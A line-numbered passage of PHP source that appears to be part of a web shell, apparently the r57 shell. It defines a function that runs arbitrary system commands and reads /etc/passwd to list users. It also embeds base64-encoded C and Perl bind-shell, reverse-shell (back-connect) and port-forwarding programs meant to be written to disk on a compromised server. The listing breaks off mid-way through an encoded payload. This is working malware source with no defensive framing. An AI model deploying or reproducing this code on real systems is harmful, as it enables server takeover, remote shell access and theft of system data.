| 975 | function ex($cfe) | ||
| 976 | { | ||
| 977 | $res = ''; | ||
| 978 | if (!empty($cfe)) | ||
| 979 | { | ||
| 980 | if(function_exists('exec')) | ||
| 981 | { | ||
| 982 | @exec($cfe,$res); | ||
| 983 | $res = join("\n",$res); | ||
| 984 | } | ||
| 985 | elseif(function_exists('shell_exec')) | ||
| 986 | { | ||
| 987 | $res = @shell_exec($cfe); | ||
| 988 | } | ||
| 989 | elseif(function_exists('system')) | ||
| 990 | { | ||
| 991 | @ob_start(); | ||
| 992 | @system($cfe); | ||
| 993 | $res = @ob_get_contents(); | ||
| 994 | @ob_end_clean(); | ||
| 995 | } | ||
| 996 | elseif(function_exists('passthru')) | ||
| 997 | { | ||
| 998 | @ob_start(); | ||
| 999 | @passthru($cfe); | ||
| 1000 | $res = @ob_get_contents(); | ||
| 1001 | @ob_end_clean(); | ||
| 1002 | } | ||
| 1003 | elseif(@is_resource($f = @popen($cfe,"r"))) | ||
| 1004 | { | ||
| 1005 | $res = ""; | ||
| 1006 | while(!@feof($f)) { $res .= @fread($f,1024); } | ||
| 1007 | @pclose($f); | ||
| 1008 | } | ||
| 1009 | } | ||
| 1010 | return $res; | ||
| 1011 | } | ||
| 1012 | function get_users() | ||
| 1013 | { | ||
| 1014 | $users = array(); | ||
| 1015 | $rows=file('/etc/passwd'); | ||
| 1016 | if(!$rows) return 0; | ||
| 1017 | foreach ($rows as $string) | ||
| 1018 | { | ||
| 1019 | $user = @explode(":",$string); | ||
| 1020 | if(substr($string,0,1)!='#') array_push($users,$user[0]); | ||
| 1021 | } | ||
| 1022 | return $users; | ||
| 1023 | } | ||
| 1024 | function we($i) | ||
| 1025 | { | ||
| 1026 | if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ???????? ? ???? '; } | ||
| 1027 | else { $text = "[-] ERROR! Can't write in file "; } | ||
| 1028 | echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; | ||
| 1029 | return null; | ||
| 1030 | } | ||
| 1031 | function re($i) | ||
| 1032 | { | ||
| 1033 | if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ????????? ???? '; } | ||
| 1034 | else { $text = "[-] ERROR! Can't read file "; } | ||
| 1035 | echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; | ||
| 1036 | return null; | ||
| 1037 | } | ||
| 1038 | function ce($i) | ||
| 1039 | { | ||
| 1040 | if($GLOBALS['language']=="ru"){ $text = "?? ??????? ??????? "; } | ||
| 1041 | else { $text = "Can't create "; } | ||
| 1042 | echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; | ||
| 1043 | return null; | ||
| 1044 | } | ||
| 1045 | function fe($l,$n) | ||
| 1046 | { | ||
| 1047 | $text['ru'] = array('?? ??????? ???????????? ? ftp ???????','?????? ??????????? ?? ftp ???????','?? ??????? ???????? ?????????? ?? ftp ???????'); | ||
| 1048 | $text['eng'] = array('Connect to ftp server failed','Login to ftp server failed','Can\'t change dir on ftp server'); | ||
| 1049 | echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>"; | ||
| 1050 | return null; | ||
| 1051 | } | ||
| 1052 | function mr($l,$n) | ||
| 1053 | { | ||
| 1054 | $text['ru'] = array('?? ??????? ????????? ??????','?????? ??????????'); | ||
| 1055 | $text['eng'] = array('Can\'t send mail','Mail sent'); | ||
| 1056 | echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>"; | ||
| 1057 | return null; | ||
| 1058 | } | ||
| 1059 | function perms($mode) | ||
| 1060 | { | ||
| 1061 | if ($GLOBALS['windows']) return 0; | ||
| 1062 | if( $mode & 0x1000 ) { $type='p'; } | ||
| 1063 | else if( $mode & 0x2000 ) { $type='c'; } | ||
| 1064 | else if( $mode & 0x4000 ) { $type='d'; } | ||
| 1065 | else if( $mode & 0x6000 ) { $type='b'; } | ||
| 1066 | else if( $mode & 0x8000 ) { $type='-'; } | ||
| 1067 | else if( $mode & 0xA000 ) { $type='l'; } | ||
| 1068 | else if( $mode & 0xC000 ) { $type='s'; } | ||
| 1069 | else $type='u'; | ||
| 1070 | $owner["read"] = ($mode & 00400) ? 'r' : '-'; | ||
| 1071 | $owner["write"] = ($mode & 00200) ? 'w' : '-'; | ||
| 1072 | $owner["execute"] = ($mode & 00100) ? 'x' : '-'; | ||
| 1073 | $group["read"] = ($mode & 00040) ? 'r' : '-'; | ||
| 1074 | $group["write"] = ($mode & 00020) ? 'w' : '-'; | ||
| 1075 | $group["execute"] = ($mode & 00010) ? 'x' : '-'; | ||
| 1076 | $world["read"] = ($mode & 00004) ? 'r' : '-'; | ||
| 1077 | $world["write"] = ($mode & 00002) ? 'w' : '-'; | ||
| 1078 | $world["execute"] = ($mode & 00001) ? 'x' : '-'; | ||
| 1079 | if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; | ||
| 1080 | if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; | ||
| 1081 | if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; | ||
| 1082 | $s=sprintf("%1s", $type); | ||
| 1083 | $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); | ||
| 1084 | $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); | ||
| 1085 | $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); | ||
| 1086 | return trim($s); | ||
| 1087 | } | ||
| 1088 | function in($type,$name,$size,$value) | ||
| 1089 | { | ||
| 1090 | $ret = "<input type=".$type." name=".$name." "; | ||
| 1091 | if($size != 0) { $ret .= "size=".$size." "; } | ||
| 1092 | $ret .= "value=\"".$value."\">"; | ||
| 1093 | return $ret; | ||
| 1094 | } | ||
| 1095 | function which($pr) | ||
| 1096 | { | ||
| 1097 | $path = ex("which $pr"); | ||
| 1098 | if(!empty($path)) { return $path; } else { return $pr; } | ||
| 1099 | } | ||
| 1100 | function cf($fname,$text) | ||
| 1101 | { | ||
| 1102 | $w_file=@fopen($fname,"w") or we($fname); | ||
| 1103 | if($w_file) | ||
| 1104 | { | ||
| 1105 | @fputs($w_file,@base64_decode($text)); | ||
| 1106 | @fclose($w_file); | ||
| 1107 | } | ||
| 1108 | } | ||
| 1109 | function sr($l,$t1,$t2) | ||
| 1110 | { | ||
| 1111 | return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; | ||
| 1112 | } | ||
| 1113 | if (!@function_exists("view_size")) | ||
| 1114 | { | ||
| 1115 | function view_size($size) | ||
| 1116 | { | ||
| 1117 | if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} | ||
| 1118 | elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} | ||
| 1119 | elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} | ||
| 1120 | else {$size = $size . " B";} | ||
| 1121 | return $size; | ||
| 1122 | } | ||
| 1123 | } | ||
| 1124 | function DirFiles($dir,$types='') | ||
| 1125 | { | ||
| 1126 | $files = Array(); | ||
| 1127 | if(($handle = @opendir($dir))) | ||
| 1128 | { | ||
| 1129 | while (FALSE !== ($file = @readdir($handle))) | ||
| 1130 | { | ||
| 1131 | if ($file != "." && $file != "..") | ||
| 1132 | { | ||
| 1133 | if(!is_dir($dir."/".$file)) | ||
| 1134 | { | ||
| 1135 | if($types) | ||
| 1136 | { | ||
| 1137 | $pos = @strrpos($file,"."); | ||
| 1138 | $ext = @substr($file,$pos,@strlen($file)-$pos); | ||
| 1139 | if(@in_array($ext,@explode(';',$types))) | ||
| 1140 | $files[] = $dir."/".$file; | ||
| 1141 | } | ||
| 1142 | else | ||
| 1143 | $files[] = $dir."/".$file; | ||
| 1144 | } | ||
| 1145 | } | ||
| 1146 | } | ||
| 1147 | @closedir($handle); | ||
| 1148 | } | ||
| 1149 | return $files; | ||
| 1150 | } | ||
| 1151 | function DirFilesWide($dir) | ||
| 1152 | { | ||
| 1153 | $files = Array(); | ||
| 1154 | $dirs = Array(); | ||
| 1155 | if(($handle = @opendir($dir))) | ||
| 1156 | { | ||
| 1157 | while (false !== ($file = @readdir($handle))) | ||
| 1158 | { | ||
| 1159 | if ($file != "." && $file != "..") | ||
| 1160 | { | ||
| 1161 | if(@is_dir($dir."/".$file)) | ||
| 1162 | { | ||
| 1163 | $file = @strtoupper($file); | ||
| 1164 | $dirs[$file] = '<DIR>'; | ||
| 1165 | } | ||
| 1166 | else | ||
| 1167 | $files[$file] = @filesize($dir."/".$file); | ||
| 1168 | } | ||
| 1169 | } | ||
| 1170 | @closedir($handle); | ||
| 1171 | @ksort($dirs); | ||
| 1172 | @ksort($files); | ||
| 1173 | $files = @array_merge($dirs,$files); | ||
| 1174 | } | ||
| 1175 | return $files; | ||
| 1176 | } | ||
| 1177 | function DirFilesR($dir,$types='') | ||
| 1178 | { | ||
| 1179 | $files = Array(); | ||
| 1180 | if(($handle = @opendir($dir))) | ||
| 1181 | { | ||
| 1182 | while (false !== ($file = @readdir($handle))) | ||
| 1183 | { | ||
| 1184 | if ($file != "." && $file != "..") | ||
| 1185 | { | ||
| 1186 | if(@is_dir($dir."/".$file)) | ||
| 1187 | $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); | ||
| 1188 | else | ||
| 1189 | { | ||
| 1190 | $pos = @strrpos($file,"."); | ||
| 1191 | $ext = @substr($file,$pos,@strlen($file)-$pos); | ||
| 1192 | if($types) | ||
| 1193 | { | ||
| 1194 | if(@in_array($ext,explode(';',$types))) | ||
| 1195 | $files[] = $dir."/".$file; | ||
| 1196 | } | ||
| 1197 | else | ||
| 1198 | $files[] = $dir."/".$file; | ||
| 1199 | } | ||
| 1200 | } | ||
| 1201 | } | ||
| 1202 | @closedir($handle); | ||
| 1203 | } | ||
| 1204 | return $files; | ||
| 1205 | } | ||
| 1206 | function DirPrintHTMLHeaders($dir) | ||
| 1207 | { | ||
| 1208 | $pockets = ''; | ||
| 1209 | $handle = @opendir($dir) or die("Can't open directory $dir"); | ||
| 1210 | echo " <ul style='margin-left: 0px; padding-left: 20px;'>\n"; | ||
| 1211 | while (false !== ($file = @readdir($handle))) | ||
| 1212 | { | ||
| 1213 | if ($file != "." && $file != "..") | ||
| 1214 | { | ||
| 1215 | if(@is_dir($dir."/".$file)) | ||
| 1216 | { | ||
| 1217 | echo " <li><b>[ $file ]</b></li>\n"; | ||
| 1218 | DirPrintHTMLHeaders($dir."/".$file); | ||
| 1219 | } | ||
| 1220 | else | ||
| 1221 | { | ||
| 1222 | $pos = @strrpos($file,"."); | ||
| 1223 | $ext = @substr($file,$pos,@strlen($file)-$pos); | ||
| 1224 | if(@in_array($ext,array('.htm','.html'))) | ||
| 1225 | { | ||
| 1226 | $header = '-=None=-'; | ||
| 1227 | $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file); | ||
| 1228 | for($a=0;$a<count($strings);$a++) | ||
| 1229 | { | ||
| 1230 | $pattern = '(<title>(.+)</title>)'; | ||
| 1231 | if(@eregi($pattern,$strings[$a],$pockets)) | ||
| 1232 | { | ||
| 1233 | $header = "«".$pockets[2]."»"; | ||
| 1234 | break; | ||
| 1235 | } | ||
| 1236 | } | ||
| 1237 | echo " <li>".$header."</li>\n"; | ||
| 1238 | } | ||
| 1239 | } | ||
| 1240 | } | ||
| 1241 | } | ||
| 1242 | echo " </ul>\n"; | ||
| 1243 | @closedir($handle); | ||
| 1244 | } | ||
| 1245 | |||
| 1246 | class SearchResult | ||
| 1247 | { | ||
| 1248 | var $text; | ||
| 1249 | var $FilesToSearch; | ||
| 1250 | var $ResultFiles; | ||
| 1251 | var $FilesTotal; | ||
| 1252 | var $MatchesCount; | ||
| 1253 | var $FileMatschesCount; | ||
| 1254 | var $TimeStart; | ||
| 1255 | var $TimeTotal; | ||
| 1256 | var $titles; | ||
| 1257 | function SearchResult($dir,$text,$filter='') | ||
| 1258 | { | ||
| 1259 | $dirs = @explode(";",$dir); | ||
| 1260 | $this->FilesToSearch = Array(); | ||
| 1261 | for($a=0;$a<count($dirs);$a++) | ||
| 1262 | $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); | ||
| 1263 | $this->text = $text; | ||
| 1264 | $this->FilesTotal = @count($this->FilesToSearch); | ||
| 1265 | $this->TimeStart = getmicrotime(); | ||
| 1266 | $this->MatchesCount = 0; | ||
| 1267 | $this->ResultFiles = Array(); | ||
| 1268 | $this->FileMatchesCount = Array(); | ||
| 1269 | $this->titles = Array(); | ||
| 1270 | } | ||
| 1271 | function GetFilesTotal() { return $this->FilesTotal; } | ||
| 1272 | function GetTitles() { return $this->titles; } | ||
| 1273 | function GetTimeTotal() { return $this->TimeTotal; } | ||
| 1274 | function GetMatchesCount() { return $this->MatchesCount; } | ||
| 1275 | function GetFileMatchesCount() { return $this->FileMatchesCount; } | ||
| 1276 | function GetResultFiles() { return $this->ResultFiles; } | ||
| 1277 | function SearchText($phrase=0,$case=0) { | ||
| 1278 | $qq = @explode(' ',$this->text); | ||
| 1279 | $delim = '|'; | ||
| 1280 | if($phrase) | ||
| 1281 | foreach($qq as $k=>$v) | ||
| 1282 | $qq[$k] = '\b'.$v.'\b'; | ||
| 1283 | $words = '('.@implode($delim,$qq).')'; | ||
| 1284 | $pattern = "/".$words."/"; | ||
| 1285 | if(!$case) | ||
| 1286 | $pattern .= 'i'; | ||
| 1287 | foreach($this->FilesToSearch as $k=>$filename) | ||
| 1288 | { | ||
| 1289 | $this->FileMatchesCount[$filename] = 0; | ||
| 1290 | $FileStrings = @file($filename) or @next; | ||
| 1291 | for($a=0;$a<@count($FileStrings);$a++) | ||
| 1292 | { | ||
| 1293 | $count = 0; | ||
| 1294 | $CurString = $FileStrings[$a]; | ||
| 1295 | $CurString = @Trim($CurString); | ||
| 1296 | $CurString = @strip_tags($CurString); | ||
| 1297 | $aa = ''; | ||
| 1298 | if(($count = @preg_match_all($pattern,$CurString,$aa))) | ||
| 1299 | { | ||
| 1300 | $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString); | ||
| 1301 | $this->ResultFiles[$filename][$a+1] = $CurString; | ||
| 1302 | $this->MatchesCount += $count; | ||
| 1303 | $this->FileMatchesCount[$filename] += $count; | ||
| 1304 | } | ||
| 1305 | } | ||
| 1306 | } | ||
| 1307 | $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); | ||
| 1308 | } | ||
| 1309 | } | ||
| 1310 | function getmicrotime() | ||
| 1311 | { | ||
| 1312 | list($usec,$sec) = @explode(" ",@microtime()); | ||
| 1313 | return ((float)$usec + (float)$sec); | ||
| 1314 | } | ||
| 1315 | $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS | ||
| 1316 | A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I | ||
| 1317 | GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt | ||
| 1318 | b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 | ||
| 1319 | pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF | ||
| 1320 | NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK | ||
| 1321 | ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog | ||
| 1322 | ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk | ||
| 1323 | 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 | ||
| 1324 | 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld | ||
| 1325 | 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu | ||
| 1326 | dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp | ||
| 1327 | lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; | ||
| 1328 | $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS | ||
| 1329 | VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs | ||
| 1330 | JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV | ||
| 1331 | TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG | ||
| 1332 | lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK | ||
| 1333 | Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i | ||
| 1334 | Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N | ||
| 1335 | lIENPTk47DQpleGl0IDA7DQp9DQp9"; | ||
| 1336 | $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj | ||
| 1337 | aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR | ||
| 1338 | hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT | ||
| 1339 | sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI | ||
| 1340 | kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi | ||
| 1341 | KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl | ||
| 1342 | OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; | ||
| 1343 | $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC | ||
| 1344 | BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb | ||
| 1345 | SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd | ||
| 1346 | KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ | ||
| 1347 | sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC | ||
| 1348 | Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D | ||
| 1349 | QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp | ||
| 1350 | Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; | ||
| 1351 | $datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 | ||
| 1352 | x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb | ||
| 1353 | HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj | ||
| 1354 | aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ | ||
| 1355 | lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm | ||
| 1356 | xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga | ||
| 1357 | W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy | ||
| 1358 | LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV | ||
| 1359 | udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow | ||
| 1360 | 0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb | ||
| 1361 | iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l | ||
| 1362 | KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA | ||
| 1363 | gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS | ||
| 1364 | hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC | ||
| 1365 | iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh | ||
| 1366 | ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ | ||
| 1367 | vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC | ||
| 1368 | AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D | ||
| 1369 | QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh | ||
| 1370 | ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 | ||
| 1371 | gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay | ||
| 1372 | wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c | ||
| 1373 | 29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy | ||
| 1374 | MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA | ||
| 1375 | gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci | ||
| 1376 | 5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ | ||
